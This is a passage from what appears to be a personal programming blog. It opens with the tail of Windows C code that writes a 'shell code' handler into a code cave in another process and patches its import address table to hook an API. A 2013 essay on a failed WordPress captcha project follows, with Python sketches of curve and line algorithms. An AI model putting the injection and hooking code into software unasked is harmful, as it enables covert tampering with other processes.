<span class="w"> </span><span class="cm">/* Read the RVA to the ImageImportDirectory */</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadRemoteDataDirectoryRVA</span><span class="p">(</span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">imageImportDirectory</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] ReadRemoteDataDirectoryRVA() failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pHookContext</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote Image Parsed. Virtual Address of RemoteDataDirectory: 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Find a code cave where to write the handler */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHandler</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindRemoteCodeCave</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handlerSize</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHandler</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Cannot find code cave in remote image...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
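<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pHookContext</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>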
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Code cave found.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Write the shell code into the code cave :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">pHandler</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)</span><span class="n">handlerBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">handlerSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">nBytesWritten</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] Couldn't write shell code. Wrote %d bytes instead of %d...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nBytesWritten</span><span class="p">,</span><span class="w"> </span><span class="n">handlerSize</span><span class="p">);</span><span class="w"></span>
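<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pHookContext</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>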
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Handler written to address 0x%x!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">pHandler</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Patch the IAT with a pointer to the handler */</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="o">-></span><span class="n">oldFuncPointer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">PatchIAT</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">pHandler</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="o">-></span><span class="n">oldFuncPointer</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] The specified API %s couldn't be located in the IAT</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">funcName</span><span class="p">);</span><span class="w"></span>
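<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pHookContext</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>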
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* The hook should be sharp by now :) */</span><span class="w"></span>
<span class="w"> </span><span class="c1">//pHookContext->pOldFuncPointer =</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">ReleaseHook</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
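<span class="w"> </span><span class="cm">/* Not implemented yet: report failure instead of returning an undefined value */</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>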
<span class="p">}</span><span class="w"></span>
<span class="cm">/* </span>
<span class="cm"> * Caller has to pass the address of its pointer (buf is a pointer to a pointer),</span>
<span class="cm"> * otherwise we lose the memory allocated here. The caller then has to free() that</span>
<span class="cm"> * memory. This is C magic... :/ </span>
<span class="cm"> */</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">RetReadProcessMemory</span><span class="p">(</span><span class="n">OUT</span><span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">sizeBuf</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"> </span><span class="n">dummy</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">numBytesRead</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">calloc</span><span class="p">(</span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">CHAR</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">*</span><span class="n">buf</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"calloc() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mh">0x666</span><span class="p">;</span><span class="w"> </span><span class="c1">// Little hack here</span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_READONLY</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read finally the process memory */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">*</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">numBytesRead</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory() in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Restore old memory protection constants */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">sizeBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dummy</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx(RESTORING) in RetReadProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="n">BOOL</span><span class="w"></span>
<span class="nf">RetWriteProcessMemory</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPVOID</span><span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="n">LPCVOID</span><span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">nSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"> </span><span class="n">dummy</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">numBytesWritten</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">PAGE_READWRITE</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">oldProtect</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx() in RetWriteProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBuffer</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">numBytesWritten</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"WriteProcessMemory() in RetWriteProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Restore old memory protection constants */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualProtectEx</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">lpBaseAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">nSize</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">oldProtect</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dummy</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"VirtualProtectEx(RESTORING) in RetWriteProcessMemory() failed with %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>The dangers of a poorly planned project2013-11-21T00:48:00+01:002013-11-21T00:48:00+01:00Nikolai Tschachertag:incolumitas.com,2013-11-21:/2013/11/21/the-dangers-of-a-badly-planned-project/<h3>Preface</h3>
<p>Do you like to fiddle around with programming projects in your spare
time? Do you sometimes start endeavors ambitiously but never
actually finish them? Are you fucking tired of stacking up unsuccessful
projects, doing mediocre work while never being thoroughly satisfied with
what you do?</p>
<p>If so, you may be inclined to listen to a few words I have to say about
my most recent failed project:</p>
<p>The idea was to create my own <em>little</em> captcha plugin for wordpress. You
can learn more about the idea by delving into some of my accompanying
investigations in the following blog posts:</p>
<ul>
<li><a href="http://incolumitas.com/2013/10/06/plotting-bezier-curves/">Plotting Bézier curves directly and with De Casteljau’s
algorithm</a></li>
<li><a href="http://incolumitas.com/2013/10/16/create-your-own-font-the-hard-way/">Create your own font the hard
way!</a></li>
</ul>
<p>Honestly, I started this project because back then I was using
<a href="wordpress.org/plugins/captcha/" title="captcha">this</a> plugin and I was
unsatisfied with it for
<a href="http://incolumitas.com/2013/11/04/a-tale-of-a-twofold-broken-wordpress-captcha-plugin/" title="captcha is broken">these</a>
reasons. This context hopefully explains some of my
motivation to start the project in the first place.</p>
<h3>The destiny of every badly planned project</h3>
<p>As with many spontaneously started projects I came up with in the past,
I was first convinced that it was an awesome idea and subsequently
started programming head-first without a clear path or at least a
slight vision of what the project should look like in the end.</p>
<p>But after reaching the first milestones, it slowly began to dawn on me that
there might be several issues inherent to the architecture and the concept
itself. This kind of coming back down to earth with a bang is nothing
new for me; it's actually a pattern I have observed several times in the
past.</p>
<p>It's really annoying, because you invested blood, sweat and tears into
your project. Let me analyze how such an idea gets wrecked over its
unfortunate evolution:</p>
<h3>Avoid quickstarts</h3>
<p>The first development stage of a fresh project is mostly euphoric:
You're able to make progress with virtually no effort. You
just code thoughtlessly without having the big picture in front of you.<br>
The reason is that your motivation is intrinsic and you don't
have to convince yourself that what you are doing is right; you're just
doing it.<br>
In this phase, you're unconsciously laying the foundation of your
project (defining classes, choosing a concrete design pattern), and the
quality and solidity of what you do <em>now</em> determines the amount of
headache and time you have to invest <em>later</em> to fix architectural
mistakes.<br>
<strong>Learn:</strong> Before you begin to write a single line of code, make sure
that you can answer the following questions: Am I implementing something
that I will actively use later, or am I just doing it for the sake of
learning? Is the end product important, or the path itself?</p>
<h3>Use existing solutions</h3>
<p>If you are like me, then you love to reinvent things: Rasterizing
Bézier curves? Plotting lines? Writing PNGs (which involves
re-implementing the pretty complex PNG specification)? Should I use
ImageMagick? Nahh, let's not use an imaging library, let's do it on my
own!<br>
Avoiding an imaging library is a concrete example and part of
the reason for the failure of my aforementioned project idea.<br>
Reinventing and re-implementing essential building blocks is mostly a
bad idea!<br>
Don't get me wrong: Doing so is highly educational and in the process
you're going to learn a hell of a lot (Example: How else would I know
now how to approximate the roots of n-th order Bézier curves
numerically with the Newton-Raphson algorithm?).<br>
But if you create elemental code on your own, you should either have
professional knowledge of the subject or huge willpower and,
most importantly, lots of time on your hands to invest in your
endeavor.</p>
<p><strong>Understand:</strong> Ask yourself whether you want to focus on the unique,
innovative part of your application, which needs to absorb all of your
imagination and creativity, or whether you prefer spending a lot of time on
parts that already exist in a better form than you would ever be able to
build.<br>
It's mostly a rhetorical question, but the paradoxical part lies here:
If you never appreciate the thinking process that accompanies the
building of an elemental software block and you always do only the
part that's completely new, you might not learn <em>enough</em> to actually build a
worthy, unique and new part. The road to a brilliant idea is paved with
many failures and dull re-implementations of existing ideas!</p>
<h3>Do not bury your aborted ideas.</h3>
<p>It's bad, believe me.<br>
You don't need to pursue a project at all costs even though it was
doomed to fail right from the beginning. But if you try to forget it and
let your code rot in some shady corner of your hard drive, you're
unconsciously reinforcing a very bad feeling: That you still have
something to complete, but you do not really know what.<br>
Make a clear decision to finish your project. Just mark it as completed
and as a failure, but put an end to it! This allows you to start over
and do better in the future! Not everything needs to be a success. Most
projects end as a failure. Such is life!</p>
<h3>Rethinking motivation and discipline</h3>
<p>Fully aware of the danger of sounding corny (does this word fit
here?): You only need to be right very few times in life:</p>
<ul>
<li>Theoretically, you need to summon up the courage only once to find
the woman of your life.</li>
<li>You only need to apply very few times in your life to get the job
of your dreams.</li>
<li>Once you have realized that Python is the very best programming language (in
combination with C), you don't need to waste your precious time on
other languages anymore ;)</li>
</ul>
<p>You can endure a thousand failures, but if you succeed just once with an
idea, you've made it.<br>
If there's a single project that doesn't end in the corner of failures,
you succeeded! So every setback you encounter in life brings you
closer to a success. The worst thing you can do: Stop trying.<br>
I honestly don't think that this is motivational nonsense: Try hard
enough, and you will eventually succeed. As simple as that.<br>
<strong>Learn:</strong> Be aware of motivation. Everybody is motivated. Everyone wants
to get in formidable physical shape, learn a lot and achieve great
things. But only a few do so. It's not a lack of intellectual ability
or fluid intelligence that keeps you from reaching mastery; it's the
addiction to comfort and shirking that makes it impossible
for you to do what you want.<br>
Ask yourself: Who will rise higher: A committed, hard-working,
averagely gifted person who spends a year on a particular task, or a
genius who expects himself to do great things in a short time?</p>
<h3>Getting concrete: What was wrong with my idea? And what did I actually learn?</h3>
<p>The initial idea was to make a(nother) captcha plugin for WordPress.</p>
<p>Maybe the first mistake was to consider doing my own version without
even inspecting the existing solutions.<br>
There are quite a few good WordPress captcha plugins out there, for
instance the one I am using now: It has prevented all forms of spam so far
and fulfills its purpose perfectly.<br>
That's all you expect from such a plugin.<br>
A <a href="http://wordpress.org/plugins/search.php?q=captcha" title="captcha alternatives">quick
search</a>
yields many good alternatives that I wasn't aware of.</p>
<p>Furthermore, I wanted to do everything on my own: Rasterizing my own
lines (Bresenham line algorithm, midpoint algorithm), plotting Bézier
splines on my own (De Casteljau's algorithm, several different
approximations, ...), generating bitmap graphics on my own and I could
continue this list indefinitely.</p>
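<p>To give an impression of what "doing it on my own" means for two of these building blocks, here is a minimal Python sketch of De Casteljau's algorithm and Bresenham's line algorithm. It is an illustration written for this post, not the code from the plugin; the function names <code>de_casteljau</code> and <code>bresenham</code> are made up for the example.</p>

```python
def de_casteljau(points, t):
    """Evaluate a Bezier curve at parameter t (0 <= t <= 1).

    points is a list of (x, y) control points. The curve point is found by
    repeatedly interpolating between neighbouring points until one is left.
    """
    pts = [tuple(p) for p in points]
    while len(pts) > 1:
        pts = [
            ((1 - t) * x0 + t * x1, (1 - t) * y0 + t * y1)
            for (x0, y0), (x1, y1) in zip(pts, pts[1:])
        ]
    return pts[0]


def bresenham(x0, y0, x1, y1):
    """Return the integer pixels on the line from (x0, y0) to (x1, y1)."""
    pixels = []
    dx, dy = abs(x1 - x0), -abs(y1 - y0)
    sx = 1 if x0 < x1 else -1
    sy = 1 if y0 < y1 else -1
    err = dx + dy  # combined error term for both axes
    while True:
        pixels.append((x0, y0))
        if x0 == x1 and y0 == y1:
            break
        e2 = 2 * err
        if e2 >= dy:  # step in x direction
            err += dy
            x0 += sx
        if e2 <= dx:  # step in y direction
            err += dx
            y0 += sy
    return pixels
```

<p>Both functions are only a few lines long, which is exactly why it is so tempting to write them yourself. The trouble starts when they have to work together reliably on every edge case.</p>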
<p>All these patchwork approaches ended in a very unstable captcha
implementation on which I couldn't build further. This meant that every
feature I tried to integrate needed exhaustive debugging while
maintaining a general overview of where the bug could possibly be
located.</p>
<p>To give an example: I tried to implement glyph filling. This involves
line/line and line/curve intersection checking. The algorithm that finds
the intersection point needs the roots of Bézier curves (which were
cubic in my case).<br>
Thus I had to implement the Newton-Raphson algorithm in order to
compute the roots. That alone was a new field for me. But combined with
my aversion to PHP and a really unstable testing environment (I could
have set up a better debugging environment, but apparently I was too lazy),
it was a pain in the ass to implement things correctly.</p>
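<p>For illustration, the root finding can be sketched in Python roughly as follows. This is a simplified sketch, not the plugin code: it looks at a single coordinate of a cubic Bézier curve and searches for the parameter <code>t</code> at which that coordinate reaches a given value (for example the y position of a scanline). All names and the default tolerances are assumptions made for this example.</p>

```python
def cubic_bezier(p, t):
    """One coordinate of a cubic Bezier curve with control values p = (p0, p1, p2, p3)."""
    p0, p1, p2, p3 = p
    u = 1 - t
    return u**3 * p0 + 3 * u**2 * t * p1 + 3 * u * t**2 * p2 + t**3 * p3


def cubic_bezier_derivative(p, t):
    """Derivative of cubic_bezier with respect to t."""
    p0, p1, p2, p3 = p
    u = 1 - t
    return 3 * u**2 * (p1 - p0) + 6 * u * t * (p2 - p1) + 3 * t**2 * (p3 - p2)


def newton_raphson_parameter(p, target, t=0.5, tol=1e-12, max_iter=50):
    """Find t with cubic_bezier(p, t) == target, or None if the iteration fails."""
    for _ in range(max_iter):
        f = cubic_bezier(p, t) - target
        if abs(f) < tol:
            return t
        slope = cubic_bezier_derivative(p, t)
        if slope == 0:  # flat spot: the Newton step is undefined
            return None
        t -= f / slope
    return None
```

<p>Newton-Raphson only finds one root per starting value and may not converge at all, so a real intersection test would have to try several starting values and discard results outside the interval from 0 to 1.</p>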
